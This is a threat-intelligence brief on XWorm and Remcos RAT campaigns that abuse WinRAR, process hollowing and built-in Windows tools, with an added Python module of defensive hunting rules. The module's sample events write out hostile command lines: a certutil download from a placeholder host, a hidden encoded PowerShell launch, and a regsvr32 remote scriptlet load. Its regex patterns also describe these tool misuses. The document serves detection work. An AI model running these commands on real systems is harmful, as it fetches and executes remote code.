New XWorm 7.1 and Remcos RAT Campaigns Abuse Windows Tools to Evade Detection, Targeting Enterprise Endpoints
What Happened — Threat actors behind XWorm 7.1 and the Remcos Remote Access Trojan have launched coordinated campaigns that leverage trusted Windows utilities (e.g., WinRAR, PowerShell, certutil) to bypass security controls. The malware exploits a known WinRAR vulnerability for initial execution and then uses process hollowing to inject its payload into legitimate processes, so that traditional AV/EDR solutions see only trusted process images.
Why It Matters for TPRM —
- Legitimate, signed Windows binaries are used as “living‑off‑the‑land” tools, so signature‑based products have no malicious file to flag and detection must rely on behaviour.
- Successful compromise can lead to long‑dwell espionage, data exfiltration, and lateral movement across a third‑party’s network.
- Vendors that rely on unmanaged Windows workstations become an indirect attack surface for their customers.
Who Is Affected — Any organization that uses Windows desktops or servers, especially those in Technology/SaaS, Financial Services, Healthcare, and Government sectors.
Recommended Actions —
- Verify that all WinRAR installations are patched to the latest version (addressing CVE‑2023‑40477).
- Harden endpoint detection by enabling behavior‑based monitoring for process‑hollowing and unusual use of native utilities.
- Enforce application allow‑listing and PowerShell Constrained Language Mode for PowerShell, certutil, and other trusted binaries.
- Conduct threat‑hunting exercises using known XWorm/Remcos IOCs and update SOC playbooks accordingly.
Technical Notes — The campaigns exploit a WinRAR archive‑handling flaw (CVE‑2023‑40477) to achieve initial code execution, then use process hollowing to inject the payload into legitimate processes. Abuse of native Windows tools (PowerShell, certutil, regsvr32) provides a “living‑off‑the‑land” approach that evades many static detection mechanisms.
Source: HackRead
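The behaviour‑based hunting the Recommended Actions and Technical Notes call for can be expressed as a small set of rules over process‑creation telemetry. The Python below is an added example written for this brief, not code from HackRead or from any vendor; the event schema (image, command line, parent image, loosely modelled on Sysmon Event ID 1) and the sample events are constructed, and the rules are illustrative starting points that a SOC would tune to its own baseline. It flags the three native tools the brief names when they are invoked in the ways defenders typically watch for, and separately flags any archive tool (here only WinRAR.exe) spawning a scripting or download utility, which is the shape an archive‑handling exploit chain takes.

```python
"""Living-off-the-land hunting rules over constructed process-creation events.

Added example for the XWorm/Remcos brief; not code from the source article.
Field names mirror Sysmon Event ID 1 loosely (Image, CommandLine, ParentImage).
"""
import re
from dataclasses import dataclass
from typing import List, Pattern, Tuple


@dataclass(frozen=True)
class ProcessEvent:
    image: str          # full path of the created process
    command_line: str   # command line as logged
    parent_image: str   # full path of the parent process


# (rule name, expected image basename, command-line pattern).  These are
# assumption-level rules for illustration, not the campaign's actual IOCs.
RULES: List[Tuple[str, str, Pattern[str]]] = [
    # certutil used to fetch or decode content rather than manage certificates
    ("certutil_download_or_decode", "certutil.exe",
     re.compile(r"-(?:urlcache|decode|encode)\b", re.I)),
    # powershell launched hidden, without profile, encoded, or with policy bypass
    ("powershell_encoded_or_hidden", "powershell.exe",
     re.compile(r"(?:^|\s)-(?:e|ec|enc|encodedcommand)\s"
                r"|-w(?:indowstyle)?\s+hidden"
                r"|(?:^|\s)-nop\b"
                r"|\bbypass\b", re.I)),
    # regsvr32 pointed at a scriptlet host or a remote location
    ("regsvr32_remote_scriptlet", "regsvr32.exe",
     re.compile(r"scrobj\.dll|https?://", re.I)),
]

# Archive handlers that should never need to spawn these children directly.
ARCHIVE_PARENTS = {"winrar.exe"}
SUSPICIOUS_CHILDREN = {"cmd.exe", "powershell.exe", "certutil.exe",
                       "regsvr32.exe", "mshta.exe", "wscript.exe"}


def basename(path: str) -> str:
    """Lower-cased file name from a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def evaluate(event: ProcessEvent) -> List[str]:
    """Return the names of every rule the event matches (empty if benign)."""
    hits: List[str] = []
    image = basename(event.image)
    for name, binary, pattern in RULES:
        if image == binary and pattern.search(event.command_line):
            hits.append(name)
    if basename(event.parent_image) in ARCHIVE_PARENTS and image in SUSPICIOUS_CHILDREN:
        hits.append("archive_tool_spawned_lolbin")
    return hits


def hunt(events: List[ProcessEvent]) -> List[Tuple[ProcessEvent, List[str]]]:
    """Keep only events that fired at least one rule, paired with the rule names."""
    results = []
    for event in events:
        hits = evaluate(event)
        if hits:
            results.append((event, hits))
    return results


# Constructed sample telemetry: two benign events, three that should fire.
SAMPLE_EVENTS = [
    ProcessEvent(r"C:\Windows\System32\certutil.exe",
                 "certutil.exe -verify cert.cer",
                 r"C:\Windows\explorer.exe"),
    ProcessEvent(r"C:\Windows\System32\certutil.exe",
                 "certutil.exe -urlcache -split -f http://example.invalid/stage.dat stage.dat",
                 r"C:\Program Files\WinRAR\WinRAR.exe"),
    ProcessEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 "powershell.exe -nop -w hidden -enc SQBFAFgA",
                 r"C:\Windows\explorer.exe"),
    ProcessEvent(r"C:\Windows\System32\regsvr32.exe",
                 "regsvr32.exe /s /u /i:http://example.invalid/a.sct scrobj.dll",
                 r"C:\Windows\System32\cmd.exe"),
    ProcessEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 "powershell.exe Get-Process",
                 r"C:\Windows\explorer.exe"),
]


if __name__ == "__main__":
    for event, hits in hunt(SAMPLE_EVENTS):
        print(f"{basename(event.image):16} <- {basename(event.parent_image):14} {hits}")
```

Running the module prints the three flagged events with their rule names. In production the events would come from Sysmon or EDR process‑creation logs rather than the constructed list; the `archive_tool_spawned_lolbin` rule is the one most specific to the WinRAR exploitation path described above and is worth keeping even after the archive tool is patched, since it also catches user‑driven execution from archives.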